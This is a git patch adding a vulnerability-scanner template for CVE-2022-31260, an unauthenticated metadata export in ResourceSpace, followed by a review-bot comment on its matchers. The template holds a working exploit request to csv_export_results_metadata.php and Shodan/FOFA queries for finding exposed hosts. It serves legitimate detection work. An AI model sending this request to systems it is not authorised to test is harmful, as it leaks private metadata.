From c221d3cf313b0a8931a32c1ee77a0c627995a89d Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 6 Nov 2024 23:23:15 +0530
Subject: [PATCH] Create CVE-2022-31260.yaml
---
http/cves/2022/CVE-2022-31260.yaml | 44 ++++++++++++++++++++++++++++++
1 file changed, 44 insertions(+)
create mode 100644 http/cves/2022/CVE-2022-31260.yaml
diff --git a/http/cves/2022/CVE-2022-31260.yaml b/http/cves/2022/CVE-2022-31260.yaml
new file mode 100644
index 0000000000..c87c11c58f
--- /dev/null
+++ b/http/cves/2022/CVE-2022-31260.yaml
@@ -0,0 +1,44 @@
+id: CVE-2022-31260
+
+info:
+ name: ResourceSpace - Metadata Export
+ author: ritikchaddha
+ severity: medium
+ description: |
+ In Montala ResourceSpace through 9.8 before r19636, csv_export_results_metadata.php allows attackers to export collection metadata via a non-NULL k value.
+ impact: |
+ Successful exploitation could lead to unauthorized access to sensitive metadata.
+ remediation: |
+ Apply the vendor-supplied patch or upgrade to the latest version to mitigate CVE-2022-31260.
+ reference:
+ - https://github.com/grymer/CVE/blob/master/CVE-2022-31260.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-31260
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2022-31260
+ cwe-id: CWE-306
+ epss-score: 0.00087
+ epss-percentile: 0.35924
+ cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: montala
+ product: resourcespace
+ shodan-query: title:"ResourceSpace"
+ fofa-query: title="ResourceSpace"
+ tags: cve,cve2022,resourcespace,misconfig
+
+http:
+ - raw:
+ - |
+ GET /pages/csv_export_results_metadata.php?k=zulu&personaldata=0&allavailable=true&submit=1 HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains_any(body, "CSV-Export -", "pagename=\"csv_export_results_metadata")'
+ - 'status_code == 200'
+ condition: and
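Review bot: The `dsl` matcher accepts either body marker through `contains_any`, so any 200 response that merely carries `pagename="csv_export_results_metadata` is reported as vulnerable. Whether a build at or after r19636 can still render that page shell (for example alongside an access-denied message) is not visible from this patch and should be confirmed against a fixed instance. If both markers appear together on the unpatched export page, requiring them jointly would cut false positives: `- 'contains_all(body, "CSV-Export -", "pagename=\"csv_export_results_metadata")'`. A YAML comment above `- raw:` (not inside the `|` block, where it would become part of the request) such as `# k only has to be non-NULL on unpatched builds; "zulu" is an arbitrary value` would tie the probe to the description. The `misconfig` tag also sits oddly with `cwe-id: CWE-306` and a remediation that says to apply a patch.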